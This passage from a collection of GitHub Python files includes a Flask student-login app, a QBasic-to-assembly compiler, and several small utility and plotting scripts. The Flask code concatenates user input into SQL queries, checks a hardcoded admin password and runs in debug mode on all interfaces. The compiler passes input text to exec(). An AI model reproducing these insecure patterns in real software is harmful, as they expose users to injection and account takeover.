%s,%s);\"\n data = (name, email, career)\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/created.html')\n else:\n return render_template('handling/error/error-save.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-save.html')\n\n@app.route('/storage-student', methods=['POST'])\n@admin_required\ndef storage_student():\n try:\n name = request.form['name']\n email = request.form['email']\n career = request.form['career']\n code = request.form['code']\n tutor = request.form['tutor']\n connection = mysql.connect()\n cursor = connection.cursor()\n if name and email and career and code and tutor and request.method == 'POST':\n sql = \"INSERT INTO `alumnos` (`id_alumno`, `nombre`, `correo`, `codigo`, `id_carrera`, `id_tutor`) VALUES (NULL, %s, %s, %s, %s, %s);;\"\n data = (name, email, code, career, tutor)\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/created.html')\n else:\n return render_template('handling/error/error-save.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-save.html')\n\n@app.route('/verify-student', methods=['POST'])\ndef verify_student():\n studentCode = request.form['code']\n if studentCode and re.match(\"^[0-9]{9}$[ ]{0}\", studentCode) and request.method == 'POST':\n connection = mysql.connect()\n cursor=connection.cursor()\n cursor.execute(\"SELECT codigo FROM alumnos WHERE codigo='\"+studentCode+\"'\")\n connection.commit()\n data = cursor.fetchall()\n result = \" \".join(str(x) for x in data)\n result = result.replace(\"(\",\"\").replace(\")\",\"\").replace(\",\",\" \").replace(\" \",\"\")\n if studentCode == result:\n connection = mysql.connect()\n cursor=connection.cursor()\n cursor.execute(\"SELECT nombre FROM alumnos WHERE codigo='\"+studentCode+\"'\")\n connection.commit()\n name = cursor.fetchall()\n value = \" \".join(str(x) for x in name)\n value = value.replace(\"(\",\"\").replace(\")\",\"\").replace(\",\",\" \").replace(\"'\",\"\")\n session['studentCode'] = studentCode\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=120)\n return redirect('/solar')\n return render_template('handling/error/error-login-student.html')\n\n@app.route('/verify-master', methods=['POST'])\ndef verify_master():\n pwd = request.form['pwd']\n if request.method == 'POST' and pwd == '123':\n session['pwd'] = pwd\n key = secrets.token_urlsafe(5)\n q.put(key)\n print(q.queue)\n msg = Message(\"🔑¡Llave Secreta!🔑\", sender= 'holasoysolarelbot@gmail.com',recipients= [\"holasoysolarelbot@gmail.com\"])\n msg.body = \"¡Hola, Administrador!👋\\n ¡Para poder proceder necesitamos la palabra clave!\\n\"+\"Key:\"+key+\"\\n¡Chécalo!👀\"\n mail.send(msg)\n return render_template('tutor/verify-key.html')\n else:\n return render_template('handling/error/error-login-master.html')\n\n@app.route('/request-code', methods=['POST'])\ndef request_code():\n original_key = q.get(1)\n print(q.queue)\n email_key = request.form['key']\n if original_key == email_key:\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=120)\n q.queue.clear()\n print(q.queue)\n del original_key, email_key\n return redirect('/form')\n else:\n q.queue.clear()\n del original_key, email_key\n return render_template('handling/error/error-key.html')\n\n\n@app.route('/logout-student')\ndef logout_student():\n session.pop('studentCode',None)\n session.permanent = False\n return redirect('/login')\n\n@app.route('/logout-master')\ndef logout_master():\n session.pop('pwd',None)\n session.permanent = False\n return redirect('/master-login')\n\nif __name__== '__main__':\n app.run(host= '0.0.0.0',port=5000, debug=True)\n","repo_name":"tristanhdez/Solar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":29827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35533596329","text":"import sys\nimport os\nverbose = False\nclass CCerr(Exception):\n def __init__(self, message, keyword):\n print(\"qbpycc: error \"+message+\" :\\n\"+keyword)\n exit(1)\nclass Nasmsheet:\n def printk(self, keyword):\n if '\"' not in keyword:\n for letter in keyword:\n if letter.isdigit():\n #probably has something to deal with math\n keyword1 = keyword[keyword.index(letter):]\n # Look, imagine we have PRINT 5+10\n # Parsing it could be very difficult and also not efficient\n # Temporary solution is just doing calculation in Python shell\n # So, we just do self.printstring = *insert calculations here*\n # But it won`t work in any other way\n # Need parser very much\n exec(\"self.printstring = str({})\".format(keyword1))\n # We already have number how much times has PRINT called\n # So we increase it by 1, do printstring*insertnumberhere*: db \"*insert value here*\", 10\n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n return\n for letter in keyword:\n if letter == '\"' or letter == \"'\":\n # Found \"!\n # Cutting string before \"!\n keyword1 = keyword[keyword.index(letter):]\n # Then searching for another one \" or '\n for lette in keyword1:\n if lette == '\"' or lette == \"'\":\n # Found second \"!\n # slicing string\n keyword1 = keyword1[keyword1.index(letter)+1:]\n keyword1 = keyword1[:-1]\n # Got it, break from cycle\n self.printstring = keyword1\n break\n for letter in keyword:\n # Huh, it looks like we have ; symbol\n # It means that after that symbol it is an variable OR EXPRESSION!\n if letter == \";\" and (keyword[keyword.index(letter)-1] == '\"' or keyword[keyword.index(letter)-1] == \"'\"):\n # If we have it in internal buffer, just add it to string!\n vari = keyword[keyword.index(letter):]\n if vari in self.var:\n self.printstring = self.printstring + self.varcontent[self.var.index(vari)]\n # Honestly, think that that internal buffer wasn't a good idea\n # Need parser EVEN MORE\n # doing the same thing as earlier\n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n # To perform a PRINT syscall we need rax set to OUTPUT, rdi set to STDOUT, rsi set to adress of string, and rdx set to lenght of it.\n # Just insert it here\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n def export(self):\n sheet = \"bits 64\\nsection .bss\\n\" #section bss\n sheet = sheet + self.bss\n sheet = sheet+\"section .text\\n\" #code section\n sheet = sheet+\"global _start\\n\" #entry label\n sheet = sheet+\"_start:\\n\"\n sheet = sheet + self.text\n sheet = sheet+\"section .data\\n\" #section data\n sheet = sheet + self.data\n sheet = sheet + \"\\n\"\n return sheet\n def interpretall(self):\n for word in self.content:\n try:\n self.interpret(word)\n except:\n # If we even hit an internal Python error, we should quit, can't proceed further, needs bugfix\n raise CCerr(\"general compiler error\", word)\n def __init__(self, content, isFullcc):\n self.content = content\n self.text = \"\"\n self.bss = \"\"\n self.data = \"\"\n self.printstring = \"\"\n self.var = []\n self.varcontent = []\n self.mctr = 0\n self.fcc = isFullcc\n self.varb = \"\"\n def interpret(self, keyword):\n if keyword[:3] == \"REM\" or keyword[:1] == \"'\":\n # REM or ' are comments\n keyword1 = keyword[1:]\n # This is a tricky thing. Python don't know is it a REM or a '\n # We can cutoff first symbol immedeately\n # I've done stupid thing there, if second letter is E than assume it's a REM\n # But if we encounter something like 'EEEEE it will cutoff some characters\n # Bugfix is pretty easy though\n if keyword1[0] == \"E\":\n keyword1 = keyword1[2:]\n self.text = self.text + \";\"+keyword1+\"\\n\"\n return\n elif keyword[:5] == \"INPUT\":\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n keyword1 = keyword[5:]\n for letter in keyword1:\n if letter == \";\":\n # Find the variable to store input\n keyword1w = keyword1.split(\";\")[0]\n keyword1var = keyword1.split(\";\")[1]\n # Call printk\n self.printk(keyword1w)\n # Reserve 1024B for the buffer\n self.bss = self.bss + keyword1var+\": resb 1024\\n\" # for now only 1024 B\n # To perform a INPUT, we need rax set to INPUT, rdi set to STDIN, rsi set to variable, rdx set to size in bytes\n self.text = self.text + \"mov rax, 0\\nmov rdi, 0\\nmov rsi, {}\\nmov rdx, 1024\\nsyscall\\n\".format(keyword1var)\n elif keyword == \"END\":\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n # To end the program, we need RAX set to 60, rdi set to 0\n self.text = self.text + \"mov rax, 60\\nxor rdi, rdi\\nsyscall\\n\"\n elif keyword == \"CLS\":\n # CLS reason in all QBASIC programs is clearing the screen\n # But we can't clear STDOUT\n # So just skip it!\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n return\n elif keyword[:5] == \"PRINT\":\n # Already explained\n varflag = False\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n for letter in keyword:\n if letter == \";\" and (keyword[keyword.index(letter)-1] == '\"' or keyword[keyword.index(letter)-1] == \"'\"):\n vari = keyword[keyword.index(letter)+1:]\n keyword = keyword.split(\";\")[0]\n varflag = True\n self.varb = vari\n if '\"' not in keyword:\n for letter in keyword:\n if letter.isdigit():\n #probably a MATH\n keyword1 = keyword[keyword.index(letter):]\n #using Python to MATH, I am not crazy to parse it by myself\n exec(\"self.printstring = str({})\".format(keyword1))\n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n return\n for letter in keyword:\n if letter == '\"' or letter == \"'\":\n keyword1 = keyword[keyword.index(letter):]\n for lette in keyword1:\n if lette == '\"' or lette == \"'\":\n keyword1 = keyword1[keyword1.index(letter)+1:]\n keyword1 = keyword1[:-1]\n self.printstring = keyword1\n break\n \n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n if varflag:\n vari = self.varb\n # indexable by compiler\n if vari in self.var:\n self.printstring = self.printstring + self.varcontent[self.var.index(vari)]\n # not indexable by compiler or doesnt exist AT ALL\n else:\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, 1024\\nsyscall\\n\".format(vari)\n elif keyword[:3] == \"LET\":\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n # First, cutoff these LET characters\n keyword1 = keyword[3:]\n # Then, remove ANY whitespaces\n keyword1 = keyword1.replace(\" \", \"\")\n # Split by \"=\"\n varname = keyword1.split(\"=\")[0]\n varc = keyword1.split(\"=\")[1]\n # varname should be a name of variable\n # varcontent - it's content\n # write values to DATA sections\n self.data = self.data + varname+ ': db \"{}\", 10\\n'.format(varc)\n # However, USE internal buffer too\n self.var.append(varname)\n self.varcontent.append(varc)\n else:\n raise CCerr(\"Not implemented or not an instruction\", keyword)\n\ndef main():\n fullCC = False\n if \"-v\" in sys.argv:\n global verbose\n verbose = True\n print(\"QBpycc: QBasic interpreter to native x86 assembly using Linux syscalls\")\n print(\"Accessing sources...\")\n if \"--help\" in sys.argv:\n print(\"Additional args:\\n-f -comment the process in the temporary file\\n-T - pass the document to stdout\\n-v - more verbosity\\n-s - save temporary files\")\n try:\n r = sys.argv[1:]\n source = r[0]\n output = r[1]\n except IndexError:\n print(\"Usage: qbpycc file.bas output.bin *additional args*\")\n exit(1)\n if \"-f\" in sys.argv:\n fullCC = True\n sourcehandle = open(source, \"r\")\n content = sourcehandle.readlines()\n content = [x.strip() for x in content]\n if verbose:\n print(\"Interpreting...\")\n sheet = Nasmsheet(content, fullCC)\n sheet.interpretall()\n shee = sheet.export()\n outputhandle = open(\"qbpycc.tmp\", \"w+\")\n outputhandle.write(shee)\n outputhandle.close()\n if verbose:\n print(\"Using NASM...\")\n os.system(\"nasm -felf64 qbpycc.tmp\")\n if verbose:\n print(\"Linking...\")\n if \"-T\" in sys.argv:\n print(shee)\n os.system(\"ld qbpycc.o -o \"+output)\n sourcehandle.close()\n if \"-s\" not in sys.argv:\n os.remove(\"qbpycc.o\")\n os.remove(\"qbpycc.tmp\")\nif __name__ == \"__main__\":\n main()\n","repo_name":"nergzd723/qbpycc","sub_path":"qbpycc.py","file_name":"qbpycc.py","file_ext":"py","file_size_in_byte":11537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31214341338","text":"#!/usr/bin/env python\n#coding:utf8\n#author:xdsecret1@gmail.com\n\nfrom table import Table\n\nclass GuildTechEffect(Table):\n def __init__(self, cur, wb):\n Table.sheet_name = u'guildtecheffect(联盟科技效果)'\n Table.sql = 'select * from guildtecheffect'\n Table.titles = (u'ID', u'科技ID', u'科技等级', u'科技名称', u'效果名称', u'效果描述', u'图片路径', u'联盟Con', u'升次数', u'升级荣誉', u'依赖建筑', u'依赖建筑等级', u'依赖联盟等级', u'效果ID', u'参数1', u'参数2', u'参数3')\n Table.__init__(self, cur, wb)\n","repo_name":"miwoow/UsefulTools","sub_path":"src/qixiong/tables/guildtecheffect.py","file_name":"guildtecheffect.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74085326187","text":"'''This program takes an integer and reverses the digits of that integer\n'''\n\ndef main(n):\n ans = n[::-1]\n print(\"The no. you entered : \",int(n))\n print(\"The reverse of the no. is : \",ans)\n\n\nif __name__ == '__main__':\n n=int(input(\"Enter the no. of integers you want to reverse : \"))\n for i in range(n):\n no=input(\"Enter an integer : \")\n main(no)\n","repo_name":"amitmakhija/python","sub_path":"reverseinteger.py","file_name":"reverseinteger.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29910522393","text":"from pathlib import Path\n\nCURRENT_PATH = Path(__file__)\n\nARCHIVO_CSV_PATH = CURRENT_PATH.parent.parent.joinpath(\n \"project\").joinpath(\"assets\").joinpath(\"test.csv\")\n\n\nclass Person():\n def __init__(self, name, last_name, age, ci, work):\n self.name = name\n self.last_name = last_name\n self.age = age\n self.ci = ci\n self.work = work\n\n\n# Imprimir un enter\nprint(\"\\n\")\nfile_csv = open(ARCHIVO_CSV_PATH, \"r\", encoding=\"utf8\")\nlines_in_file = file_csv.readlines()\nfile_csv.close()\n\n\ndef from_line_to_person(line):\n values = line.split(',')\n return Person(values[0], values[1], int(values[2]), values[3], values[4])\n\n\npersons = list(map(from_line_to_person, lines_in_file[1:]))\n\nprint(\"Personas inscritas\", len(persons))\nprint(\"Personas mayores 30:\", len(\n list(filter(lambda person: person.age >= 30, persons))))\n","repo_name":"cruzortiz99/python-course","sub_path":"cap_7/read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30974767249","text":"\"\"\"\n程序主入口\n\"\"\"\n\nimport unittest\nfrom BeautifulReport import BeautifulReport\n\n\ndef suite():\n \"\"\"\n 定义测试套件,并加载测试用例\n :return:\n \"\"\"\n suite = unittest.TestSuite()\n tests = unittest.TestLoader().discover(start_dir='./testcases', pattern=\"test*.py\")\n suite.addTests(tests)\n return suite\n\n\nif __name__ == '__main__':\n \"\"\"\n 执行测试套件,生成测试报告\n \"\"\"\n suite = suite()\n result = BeautifulReport(suite)\n result.report(report_dir='./report', filename='cnode测试报告', description='test_conde')\n","repo_name":"panc-test/api-test-demo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34521672035","text":"import __main__\n__main__.pymol_argv = [ 'pymol' ]\n\nimport sys, time, os\nimport pymol\n\npymol.finish_launching()\n\nfrom pymol import cmd\n\ncmd.load(sys.argv[1])\npenalties = sys.argv[2]\nmax_num = int(sys.argv[3])\n\n#cmd.set(\"dash_width\", 4)\n#cmd.set(\"dash_width\", 4)\n\ncount = 0\nwith open(penalties, \"r\") as f:\n\tfor line in f.readlines()[:max_num]:\n\t\tsplit = line.split()\n\t\t\n\t\tname = split[0]+\"_\"+split[1]\n\t\tcmd.distance(name, \"id \"+split[0], \"id \"+split[1])\n\t\t\n\t\tif max_num <= 10:\n\t\t\tcmd.color(\"br\"+str(9-count), name)\n\t\t\n\t\tcount += 1\n","repo_name":"ignatovmg/nmr","sub_path":"src/pymol_draw_dists.py","file_name":"pymol_draw_dists.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12428185490","text":"from __future__ import (division, unicode_literals, absolute_import,\n print_function)\n\nimport collections\nimport re\nimport sys # pylint: disable=W0611\nimport logging\nimport numbers\n\nimport numpy\nimport matplotlib.figure\nimport six\n\nfrom .exceptions import PyfigError\nfrom . import tools\n\nMARKERSIZE = {\n \"+\": 2,\n \"1\": 2,\n \"s\": 1,\n \"^\": 1.5,\n \"<\": 1.5,\n \"o\": 1.5,\n \"x\": 1.5,\n \"D\": 1,\n \">\": 1.5,\n \"*\": 2,\n \"\": 1}\nlogger = logging.getLogger(__name__)\n\n\nclass Axes(matplotlib.axes.Axes):\n \"\"\"Axes with some extra functions\"\"\"\n\n def __init__(self, fig, *args, **kwargs):\n self.fig = fig\n if \"row\" in kwargs and \"col\" in kwargs:\n self.row, self.col = self.fig.get_row_col(\n kwargs.pop(\"row\"), kwargs.pop(\"col\"))\n args = (self.get_axpos(),)\n elif \"ax1\" in kwargs:\n ax1 = kwargs.pop(\"ax1\")\n self.row = ax1.row\n self.col = ax1.col\n args = (self.get_axpos(),)\n # args = (ax1.get_axpos(),)\n ax1.parent = self\n else:\n self.row = None\n self.col = None\n self.horizontal = False\n self.parent = None\n self.ylim_manual = None\n self.xlim_manual = None\n matplotlib.axes.Axes.__init__(self, fig, *args, **kwargs)\n\n self.min_row, self.max_row = (\n self.row if isinstance(self.row, tuple) else\n (self.row, self.row))\n self.min_col, self.max_col = (\n self.col if isinstance(self.col, tuple) else\n (self.col, self.col))\n\n self.ncol = 1\n self.loc = \"upper right\"\n self.xaxis.tick_bottom()\n\n def plot(self, *args, **kwargs):\n return self._plot1(\"plot\", *args, **kwargs)\n\n def axvspan(self, *args, **kwargs):\n return self._plot2(\"axvspan\", *args, **kwargs)\n\n def fill(self, *args, **kwargs):\n return self._plot1(\"fill\", *args, **kwargs)\n\n def axhline(self, *args, **kwargs):\n \"\"\"ax.axhline function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = self.switch_horizontal(\n matplotlib.axes.Axes.axvline,\n matplotlib.axes.Axes.axhline,\n *args, **kwargs)\n if label:\n self.fig.add_line(result, label, leg_place)\n return result\n\n def axvline(self, *args, **kwargs):\n \"\"\"ax.axvline function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = self.switch_horizontal(\n matplotlib.axes.Axes.axhline,\n matplotlib.axes.Axes.axvline,\n *args, **kwargs)\n if label:\n self.fig.add_line(result, label, leg_place)\n return result\n\n def get_axpos(self):\n \"\"\"Determine the ax position\"\"\"\n return self.fig.get_axpos(self.row, self.col)\n\n def _plot1(self, ax_func, *args, **kwargs):\n \"\"\"ax.ax_function, result[0] in legend\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = getattr(matplotlib.axes.Axes, ax_func)(self, *args, **kwargs)\n if label:\n self.fig.add_line(result[0], label, leg_place)\n return result\n\n def _plot2(self, ax_func, *args, **kwargs):\n \"\"\"ax.ax_function, result in legend\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n result = getattr(matplotlib.axes.Axes, ax_func)(self, *args, **kwargs)\n if label:\n self.fig.add_line(result, label, leg_place)\n return result\n\n def pie(self, *args, **kwargs):\n \"\"\"ax.pie function\"\"\"\n\n if \"radius\" in kwargs and matplotlib.__version__ < \"1.2.1\":\n # older version of matplotlib do not have radius for pie\n del kwargs[\"radius\"]\n if \"colors\" in kwargs and \"legends\" in kwargs:\n colors = []\n for color, legend in zip(kwargs[\"colors\"], kwargs[\"legends\"]):\n new_kwargs = {\"color\": color}\n self._update_mix(new_kwargs, legend, \"fig\")\n self._update_color(new_kwargs)\n colors.append(new_kwargs[\"color\"])\n kwargs[\"colors\"] = colors\n\n legends = kwargs.pop(\"legends\", None)\n\n if \"autopct\" in kwargs and kwargs[\"autopct\"] == \"values\":\n def autopct(pct):\n \"\"\"Define the autopct function to display the total\"\"\"\n total = sum(args[0])\n val = int(round(pct * total / 100))\n return \"{0}\".format(val)\n # return '{p:.2f}% ({v:d})'.format(p=pct,v=val)\n kwargs[\"autopct\"] = autopct\n\n result = matplotlib.axes.Axes.pie(self, *args, **kwargs)\n if legends:\n for line, legend in zip(result[0], legends):\n self.fig.add_line(line, legend)\n return result\n\n def bar(self, left, height, *args, **kwargs):\n \"\"\"ax.bar function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n if \"hatch\" in kwargs and isinstance(kwargs[\"hatch\"], list):\n hatches = kwargs[\"hatch\"]\n kwargs[\"hatch\"] = \"\"\n else:\n hatches = None\n\n if self.horizontal:\n bottom = kwargs.pop(\"bottom\", None)\n width = kwargs.pop(\"width\", 0.8)\n self.horizontal = False\n result = matplotlib.axes.Axes.bar(\n self, left=bottom,\n height=width, width=height, bottom=left,\n orientation=\"horizontal\", **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.bar(\n self, left, height, *args, **kwargs)\n if label and len(result) > 0:\n self.fig.add_line(result[0], label, leg_place)\n\n if hatches:\n for hatch, mybar in zip(hatches, result):\n mybar.set_hatch(hatch)\n return result\n\n def errorbar(self, xcoord, ycoord, *args, **kwargs):\n \"\"\"ax.errorbar function\"\"\"\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n\n if kwargs.get(\"fmt\") == \"none\" and matplotlib.__version__ < \"1.4\":\n kwargs[\"fmt\"] = None\n\n if self.horizontal:\n self.horizontal = False\n yerr = kwargs.pop(\"yerr\", None)\n result = matplotlib.axes.Axes.errorbar(\n self, ycoord, xcoord, xerr=yerr, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.errorbar(\n self, xcoord, ycoord, *args, **kwargs)\n if label:\n self.fig.add_line(result[0], label, leg_place)\n return result\n\n def text(self, x, y, text, **kwargs):\n \"\"\"ax.text function\"\"\"\n text, kwargs = self.fig.latex(text, kwargs)\n label, leg_place = self._get_label(kwargs)\n self._update_mix(kwargs, label, leg_place)\n self._update_color(kwargs)\n return matplotlib.axes.Axes.text(self, x, y, text, **kwargs)\n\n def set_ylabel(self, text, **kwargs):\n \"\"\"Add some latex tricks\"\"\"\n text, kwargs = self.fig.latex(text, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_xlabel(\n self.parent if self.parent is not None else self,\n text, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_ylabel(self, text, **kwargs)\n return result\n\n def set_xlabel(self, text, **kwargs):\n \"\"\"set xlabel with latex tricks\"\"\"\n text, kwargs = self.fig.latex(text, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_ylabel(self, text, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_xlabel(\n self.parent if self.parent is not None else self,\n text, **kwargs)\n return result\n\n @staticmethod\n def _get_label(kwargs):\n \"\"\"Get the label, and remove it\"\"\"\n label = kwargs.pop(\"label\", None)\n if label == \"_nolegend_\":\n label = None\n leg_place = kwargs.pop(\"leg_place\", \"fig\")\n return label, leg_place\n\n def _update_color(self, kwargs):\n \"\"\"Update colors and markersize\"\"\"\n\n for elem in (key for key in list(kwargs.keys())\n if key.endswith(\"color\")):\n if isinstance(kwargs[elem], list):\n for i, item in enumerate(kwargs[elem]):\n for key, value in self.parse_color(item).items():\n if elem[:-5] == \"\" or key == \"color\":\n kwargs[elem[:-5] + key][i] = value\n else:\n for key, value in self.parse_color(kwargs[elem]).items():\n if elem[:-5] == \"\" or key == \"color\":\n kwargs[elem[:-5] + key] = value\n\n if \"markersize\" in kwargs and \"marker\" in kwargs:\n if kwargs[\"marker\"] in MARKERSIZE:\n kwargs[\"markersize\"] *= MARKERSIZE[kwargs[\"marker\"]]\n else:\n logger.error(\"No markersize correction for %s\",\n repr(kwargs[\"marker\"]))\n\n def set_open(self):\n \"\"\"Set the ax to not have upper and right frame\"\"\"\n self.spines[\"top\"].set_color(\"none\")\n self.spines[\"right\"].set_color(\"none\")\n self.yaxis.set_ticks_position(\"left\")\n\n def set_ylim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n if \"auto\" not in kwargs:\n self.ylim_manual = args\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_xlim,\n matplotlib.axes.Axes.set_ylim,\n *args, **kwargs)\n\n def get_ylim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xlim,\n matplotlib.axes.Axes.get_ylim,\n *args, **kwargs)\n\n def get_xlabel(self, *args, **kwargs):\n \"\"\"get xlabel\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_ylabel,\n matplotlib.axes.Axes.get_xlabel,\n *args, **kwargs)\n\n def get_ylabel(self, *args, **kwargs):\n \"\"\"set ylabel\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xlabel,\n matplotlib.axes.Axes.get_ylabel,\n *args, **kwargs)\n\n def set_xticks(self, *args, **kwargs):\n \"\"\"set xticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_yticks,\n matplotlib.axes.Axes.set_xticks,\n *args, **kwargs)\n\n def set_yticks(self, *args, **kwargs):\n \"\"\"set yticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_xticks,\n matplotlib.axes.Axes.set_yticks,\n *args, **kwargs)\n\n def set_xticklabels(self, labels, **kwargs):\n \"\"\"set xticklabels\"\"\"\n labels, kwargs = self.fig.latex(labels, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_yticklabels(\n self, labels, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_xticklabels(\n self, labels, **kwargs)\n return result\n\n def set_yticklabels(self, labels, **kwargs):\n \"\"\"set yticklabels\"\"\"\n labels, kwargs = self.fig.latex(labels, kwargs)\n if self.horizontal:\n self.horizontal = False\n result = matplotlib.axes.Axes.set_xticklabels(\n self, labels, **kwargs)\n self.horizontal = True\n else:\n result = matplotlib.axes.Axes.set_yticklabels(\n self, labels, **kwargs)\n return result\n\n def get_xticks(self, *args, **kwargs):\n \"\"\"get xticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_yticks,\n matplotlib.axes.Axes.get_xticks,\n *args, **kwargs)\n\n def get_yticks(self, *args, **kwargs):\n \"\"\"get yticks\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xticks,\n matplotlib.axes.Axes.get_yticks,\n *args, **kwargs)\n\n def get_xticklines(self, *args, **kwargs):\n \"\"\"get xticklines\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_yticklines,\n matplotlib.axes.Axes.get_xticklines,\n *args, **kwargs)\n\n def get_yticklines(self, *args, **kwargs):\n \"\"\"set yticklabels\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xticklines,\n matplotlib.axes.Axes.get_yticklines,\n *args, **kwargs)\n\n def get_xticklabels(self, *args, **kwargs):\n \"\"\"get xticklabels\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_yticklabels,\n matplotlib.axes.Axes.get_xticklabels,\n *args, **kwargs)\n\n def get_yticklabels(self, *args, **kwargs):\n \"\"\"set yticklabels\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_xticklabels,\n matplotlib.axes.Axes.get_yticklabels,\n *args, **kwargs)\n\n def switch_horizontal(self, func_horizontal, func, *args, **kwargs):\n \"\"\"Run function based on wheter horizontal is set\"\"\"\n if self.horizontal:\n self.horizontal = False\n result = func_horizontal(self, *args, **kwargs)\n self.horizontal = True\n else:\n result = func(self, *args, **kwargs)\n return result\n\n def set_xlim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n if \"auto\" not in kwargs:\n self.xlim_manual = args\n return self.switch_horizontal(\n matplotlib.axes.Axes.set_ylim,\n matplotlib.axes.Axes.set_xlim,\n *args, **kwargs)\n\n def get_xlim(self, *args, **kwargs):\n \"\"\"Set the xlimits (taking care of horizontal)\"\"\"\n return self.switch_horizontal(\n matplotlib.axes.Axes.get_ylim,\n matplotlib.axes.Axes.get_xlim,\n *args, **kwargs)\n\n def set_xstyle(self, style):\n \"\"\"Set the style of x-axis for the date\"\"\"\n\n if style == \"month\":\n self.xaxis.set_major_formatter(\n 